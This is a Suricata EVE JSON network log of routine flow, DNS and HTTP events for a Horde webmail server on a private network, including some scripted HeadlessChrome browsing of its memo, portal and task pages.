{"timestamp":"2020-02-29T00:13:21.000929+0000","flow_id":957166403243598,"event_type":"flow","src_ip":"192.168.10.122","src_port":34478,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:20.380494+0000","end":"2020-02-29T00:08:20.488895+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:24.094571+0000","flow_id":875772497513137,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52752,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":770,"tx_id":0}} {"timestamp":"2020-02-29T00:13:24.749341+0000","flow_id":780334029631261,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57609,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:24.857976+0000","flow_id":780334029631261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36750,"proto":"UDP","dns":{"type":"answer","id":57609,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:13:24.857976+0000","flow_id":780334029631261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36750,"proto":"UDP","dns":{"type":"answer","id":57609,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:24.880383+0000","flow_id":1016531461094710,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34818,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:13:24.880383+0000","flow_id":1016531461094710,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34818,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} 
{"timestamp":"2020-02-29T00:13:26.000189+0000","event_type":"stats","stats":{"uptime":14458,"capture":{"kernel_packets":135481,"kernel_drops":0},"decoder":{"pkts":135483,"bytes":93345767,"invalid":187,"ipv4":133988,"ipv6":8,"ethernet":135483,"raw":0,"null":0,"sll":0,"tcp":128680,"udp":5106,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7100224},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2771,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2787,"synack":2778,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1810,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2332,"failed_udp":112},"tx":{"http":4664,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2412}},"flow_mgr":{"closed_pruned":2745,"new_pruned":15,"est_pruned":2376,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23139,"memcap_state":0,"memcap_global":0},"http":{"memuse":109003,"memcap":0}}} 
{"timestamp":"2020-02-29T00:13:27.000158+0000","flow_id":427648475654620,"event_type":"flow","src_ip":"192.168.10.122","src_port":47740,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:26.322012+0000","end":"2020-02-29T00:08:26.430911+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:28.000628+0000","flow_id":58766619475456,"event_type":"flow","src_ip":"192.168.10.122","src_port":49361,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":174,"bytes_toclient":284,"start":"2020-02-29T00:08:26.884224+0000","end":"2020-02-29T00:08:27.119823+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:29.881739+0000","flow_id":1016531461094710,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34818,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} 
{"timestamp":"2020-02-29T00:13:31.000242+0000","flow_id":1144822130078229,"event_type":"flow","src_ip":"192.168.10.130","src_port":34806,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1171,"bytes_toclient":6580,"start":"2020-02-29T00:12:20.586261+0000","end":"2020-02-29T00:12:30.427636+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:31.396069+0000","flow_id":400710460705573,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45826,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56583,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:31.504125+0000","flow_id":400710460705573,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45826,"proto":"UDP","dns":{"type":"answer","id":56583,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:31.504125+0000","flow_id":400710460705573,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45826,"proto":"UDP","dns":{"type":"answer","id":56583,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:31.556421+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:13:31.556421+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":205,"tx_id":0}} {"timestamp":"2020-02-29T00:13:31.570323+0000","flow_id":1353815243338707,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42553,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57985,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:31.678579+0000","flow_id":1353815243338707,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42553,"proto":"UDP","dns":{"type":"answer","id":57985,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:31.678579+0000","flow_id":1353815243338707,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42553,"proto":"UDP","dns":{"type":"answer","id":57985,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:13:31.777304+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5052}} {"timestamp":"2020-02-29T00:13:33.000151+0000","event_type":"stats","stats":{"uptime":14465,"capture":{"kernel_packets":135505,"kernel_drops":0},"decoder":{"pkts":135522,"bytes":93356849,"invalid":187,"ipv4":134023,"ipv6":8,"ethernet":135522,"raw":0,"null":0,"sll":0,"tcp":128709,"udp":5112,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7100224},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2773,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2789,"synack":2780,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1812,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2335,"failed_udp":112},"tx":{"http":4667,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2415}},"flow_mgr":{"closed_pruned":2746,"new_pruned":15,"est_pruned":2378,"bypassed_pr
uned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23139,"memcap_state":0,"memcap_global":0},"http":{"memuse":121715,"memcap":0}}} {"timestamp":"2020-02-29T00:13:33.001385+0000","flow_id":204108328578649,"event_type":"flow","src_ip":"192.168.10.130","src_port":34808,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":9,"bytes_toserver":1215,"bytes_toclient":7636,"start":"2020-02-29T00:12:27.634457+0000","end":"2020-02-29T00:12:32.916036+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:36.778490+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34820,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5052},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":21937,"tx_id":1}} {"timestamp":"2020-02-29T00:13:39.000406+0000","flow_id":1562984426416529,"event_type":"flow","src_ip":"192.168.10.122","src_port":38137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:38.305553+0000","end":"2020-02-29T00:08:38.414838+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:13:40.000141+0000","event_type":"stats","stats":{"uptime":14472,"capture":{"kernel_packets":135522,"kernel_drops":0},"decoder":{"pkts":135525,"bytes":93357047,"invalid":187,"ipv4":134026,"ipv6":8,"ethernet":135525,"raw":0,"null":0,"sll":0,"tcp":128712,"udp":5112,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2773,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2789,"synack":2780,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1812,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2335,"failed_udp":112},"tx":{"http":4667,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2415}},"flow_mgr":{"closed_pruned":2747,"new_pruned":15,"est_pruned":2378,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22808,"memcap_state":0,"memcap_global":0},"http":{"memuse":69891,"memcap":0}}} 
{"timestamp":"2020-02-29T00:13:41.000382+0000","flow_id":454818455014582,"event_type":"flow","src_ip":"192.168.10.130","src_port":34812,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1079,"bytes_toclient":5726,"start":"2020-02-29T00:12:34.904374+0000","end":"2020-02-29T00:12:40.104449+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:44.000537+0000","flow_id":931899127526949,"event_type":"flow","src_ip":"192.168.10.81","src_port":52732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":10,"bytes_toserver":969,"bytes_toclient":8961,"start":"2020-02-29T00:12:38.423461+0000","end":"2020-02-29T00:12:43.700773+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:46.283999+0000","flow_id":302931236246879,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36289,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":53267,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:46.392737+0000","flow_id":302931236246879,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36289,"proto":"UDP","dns":{"type":"answer","id":53267,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:13:46.392737+0000","flow_id":302931236246879,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36289,"proto":"UDP","dns":{"type":"answer","id":53267,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:46.542266+0000","flow_id":36578839428506,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34822,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7092}} {"timestamp":"2020-02-29T00:13:47.000164+0000","event_type":"stats","stats":{"uptime":14479,"capture":{"kernel_packets":135522,"kernel_drops":0},"decoder":{"pkts":135525,"bytes":93357047,"invalid":187,"ipv4":134026,"ipv6":8,"ethernet":135525,"raw":0,"null":0,"sll":0,"tcp":128712,"udp":5112,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2773,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2789,"synack":2780,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reas
sembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1812,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2335,"failed_udp":112},"tx":{"http":4667,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2415}},"flow_mgr":{"closed_pruned":2749,"new_pruned":15,"est_pruned":2379,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23139,"memcap_state":0,"memcap_global":0},"http":{"memuse":86717,"memcap":0}}} {"timestamp":"2020-02-29T00:13:50.000191+0000","flow_id":569176254904198,"event_type":"flow","src_ip":"192.168.10.81","src_port":52740,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:12:44.456582+0000","end":"2020-02-29T00:12:49.495013+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:50.001136+0000","flow_id":618010033054210,"event_type":"flow","src_ip":"192.168.10.81","src_port":52738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":23,"bytes_toserver":2113,"bytes_toclient":27714,"start":"2020-02-29T00:12:44.451074+0000","end":"2020-02-29T00:12:49.823477+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:13:50.001870+0000","flow_id":1828739838965696,"event_type":"flow","src_ip":"192.168.10.81","src_port":52742,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":3,"bytes_toserver":272,"bytes_toclient":206,"start":"2020-02-29T00:12:44.456640+0000","end":"2020-02-29T00:12:49.495139+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:51.000268+0000","flow_id":1572119837955811,"event_type":"flow","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":31,"pkts_toclient":45,"bytes_toserver":5382,"bytes_toclient":54890,"start":"2020-02-29T00:12:44.349923+0000","end":"2020-02-29T00:12:50.097921+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:51.000970+0000","flow_id":1404448609633777,"event_type":"flow","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":65,"pkts_toclient":106,"bytes_toserver":11740,"bytes_toclient":134404,"start":"2020-02-29T00:12:43.886257+0000","end":"2020-02-29T00:12:50.111525+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:51.544391+0000","flow_id":36578839428506,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34822,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 
(X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7092},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38924,"tx_id":0}} {"timestamp":"2020-02-29T00:13:51.634397+0000","flow_id":720204489272861,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37890,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38735,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:51.742601+0000","flow_id":720204489272861,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37890,"proto":"UDP","dns":{"type":"answer","id":38735,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:51.742601+0000","flow_id":720204489272861,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37890,"proto":"UDP","dns":{"type":"answer","id":38735,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:51.831022+0000","flow_id":1297456683777400,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34824,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8117}} 
{"timestamp":"2020-02-29T00:13:53.127322+0000","flow_id":902968232767834,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38101,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60152,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:53.235775+0000","flow_id":902968232767834,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38101,"proto":"UDP","dns":{"type":"answer","id":60152,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:53.235775+0000","flow_id":902968232767834,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38101,"proto":"UDP","dns":{"type":"answer","id":60152,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 